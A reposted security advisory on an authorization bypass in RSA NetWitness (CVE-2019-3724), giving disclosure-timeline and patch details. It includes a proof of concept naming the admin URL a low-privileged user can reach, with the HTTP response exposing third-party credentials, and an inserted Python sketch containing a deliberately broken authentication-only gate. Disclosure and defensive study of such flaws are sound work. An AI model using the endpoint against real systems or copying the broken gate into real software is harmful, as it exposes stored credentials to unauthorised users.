Authorization Bypass in RSA NetWitness
Views: 6800
Published: 2019-06-26


SEC Consult Vulnerability Lab Security Advisory < 20190515-0 >

=======================================================================
  title: Authorization Bypass
  product: RSA NetWitness
  vulnerable version: <10.6.6.1, <11.2.1.1
  fixed version: 10.6.6.1, 11.2.1.1
  CVE number: CVE-2019-3724
  impact: Medium
  homepage:
  found: 2018-09-18
  by: Mantas Juskauskas (Office Vilnius)
  SEC Consult Vulnerability Lab
  An integrated part of SEC Consult
  Europe | Asia | North America
=======================================================================
Vendor description:
-------------------
"RSA provides more than 30,000 customers around the world with the essential
security capabilities to protect their most valuable assets from cyber
threats. With RSA's award-winning products, organizations effectively detect,
investigate, and respond to advanced attacks; confirm and manage identities;
and ultimately, reduce IP theft, fraud, and cybercrime."
Source:
Business recommendation:
------------------------
By exploiting the vulnerability documented in this advisory an unauthorized
attacker can access an administrative resource that may contain plain text
credentials to a 3rd party system.
The vendor provides a patch which should be installed on affected systems.
Vulnerability overview/description:
-----------------------------------
The authorization mechanism provided by the platform is prone to an authorization
bypass vulnerability, which can be easily exploited by authenticated (but low
privileged) remote attackers for gaining access to administrative information
including plaintext passwords.
Proof of concept:
-----------------
A logged-in low privileged user (e.g. with role Analyst) is able to access
an administrative resource by calling the following URL:
https://[host]/admin/system/whois/properties
After the above URL is accessed, the server returns the following HTTP response
that contains sensitive information to a 3rd party whois service including
plaintext passwords:
HTTP/1.1 200 OK
Server: nginx
Date: [snip]
Content-Type: application/json;charset=UTF-8
Connection: close
X-Frame-Options: SAMEORIGIN
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
X-Content-Type-Options: nosniff
Strict-Transport-Security: max-age=31536000 ; includeSubDomains
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Set-Cookie: [snip]
Content-Length: 795
{"success":true,"data":{"queryUrl":"https://[snip]","authUrl":"https://[snip]","userId":"[snip]","pw":"[snip]","allowedRequests":100,"allowedRequestsInterval":60,"queueMaxSize":100000,"cacheMaxSize":50000,"refreshInterval":30,"waitForHttpRequests":true,"settings":{"query-url":"https://[snip]","queue-max-size":100000,"password":"[snip]","allowed-requests":100,"auth-url":"https://[snip]","user-id":"[snip]","refresh-interval-seconds":{"seconds":2592000,"milliSeconds":2592000000},"cache-max-size":50000,"wait-for-http-request":true,"allowed-requests-interval-seconds":{"seconds":60,"milliSeconds":60000}}}}
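As an added illustration (not code from the advisory or from RSA), the following Python sketch contrasts the broken pattern described above, where being logged in is enough to reach an /admin/ resource, with a role-aware check, and redacts the password fields seen in the response shape. The user records, role names other than "Analyst", and the sample body values are constructed.

```python
import json
import posixpath
from typing import Any, Callable, Dict, Tuple

# Constructed sample mirroring the key layout of the leaked body (placeholder values).
SAMPLE_RESPONSE = json.loads(
    '{"success":true,"data":{"queryUrl":"https://whois.example.invalid/q",'
    '"authUrl":"https://whois.example.invalid/auth","userId":"svc-whois",'
    '"pw":"s3cret","allowedRequests":100,"settings":{"query-url":'
    '"https://whois.example.invalid/q","password":"s3cret","user-id":"svc-whois"}}}'
)

# Hypothetical user records; "Analyst" is the low-privileged role named in the advisory.
ANALYST = {"name": "alice", "authenticated": True, "roles": {"Analyst"}}
ADMIN = {"name": "bob", "authenticated": True, "roles": {"Administrator"}}
ANON = {"name": None, "authenticated": False, "roles": set()}

WHOIS_PATH = "/admin/system/whois/properties"  # endpoint from the advisory
SECRET_KEYS = {"pw", "password"}               # keys observed in the response

def is_admin_path(path: str) -> bool:
    # Normalise first so "/admin/../admin/x" style paths cannot dodge the prefix test.
    norm = posixpath.normpath(path)
    return norm == "/admin" or norm.startswith("/admin/")

def authn_only_gate(user: Dict[str, Any], path: str) -> bool:
    # Broken pattern: authentication is treated as authorization.
    return bool(user["authenticated"])

def role_gate(user: Dict[str, Any], path: str) -> bool:
    # Fixed pattern: admin paths additionally require an administrative role.
    if not user["authenticated"]:
        return False
    if is_admin_path(path):
        return "Administrator" in user["roles"]
    return True

def redact(obj: Any) -> Any:
    # Defence in depth: never serialise stored credentials back to any client.
    if isinstance(obj, dict):
        return {k: ("[redacted]" if k in SECRET_KEYS else redact(v)) for k, v in obj.items()}
    if isinstance(obj, list):
        return [redact(v) for v in obj]
    return obj

def handle(user: Dict[str, Any], path: str, gate: Callable[..., bool]) -> Tuple[int, Any]:
    # Minimal controller: 403 when the gate rejects, otherwise the redacted properties.
    if not gate(user, path):
        return 403, {"success": False}
    return 200, redact(SAMPLE_RESPONSE)
```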
Vulnerable / tested versions:
-----------------------------
The identified vulnerability has been verified to exist in the
RSA NetWitness platform, version 11.1.0.1.
According to the vendor, platform version 10 is also affected.
The following versions are vulnerable:
* <10.6.6.1
* <11.2.1.1
Vendor contact timeline:
------------------------
2018-10-01: Contacting vendor through PGP via
2018-10-02: Vendor acknowledges the information was received, forwards
            the info to the relevant department
2018-10-11: Vendor confirms the impact of the authorization issue,
            starts to work on the remediation timeline
2018-10-15: Vendor provides additional information
2018-10-22: Contacting vendor to provide the remediation timeline
2018-10-23: Further email exchange related to the remediation timeline
2019-01-18: Vendor provides an update on the fix timeline
2019-03-05: Asking for a status update
2019-03-06: Vendor provides a status update on the release, patch for
            platform version 11 will be released in March, version 10
            Mid-April
2019-04-01: Asking for a specific release date & further status update
2019-04-01: Vendor: release is scheduled for 23rd April 2019, but may change,
            they will inform us
2019-05-06: Asking for a status update; no answer
2019-05-09: Noticed that the new release is online for a while now, asking
            the vendor for a status update again
2019-05-09: Vendor: published security advisory URL and CVE
2019-05-15: SEC Consult advisory release
Solution:
---------
The following patched versions address the identified issue:
* 11.2.1.1
* 10.6.6.1
Security advisory of the vendor:
The vendor specifically told us that version 11.3 is not affected by this
vulnerability.
Workaround:
-----------
None
Advisory URL:
-------------
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
SEC Consult Vulnerability Lab
SEC Consult
Europe | Asia | North America
About SEC Consult Vulnerability Lab
The SEC Consult Vulnerability Lab is an integrated part of SEC Consult. It
ensures the continued knowledge gain of SEC Consult in the field of network
and application security to stay ahead of the attacker. The SEC Consult
Vulnerability Lab supports high-quality penetration testing and the evaluation
of new offensive and defensive technologies for our customers. Hence our
customers obtain the most current information about vulnerabilities and valid
recommendation about the risk profile of new technologies.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Interested to work with the experts of SEC Consult?
Send us your application
Interested in improving your cyber security with the experts of SEC Consult?
Contact our local offices
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Mail: research at sec-consult dot com
Web:
Blog:
Twitter:
EOF M. Juskauskas / @2019

Reposted from: https://www.cnblogs.com/iAmSoScArEd/p/10996833.html
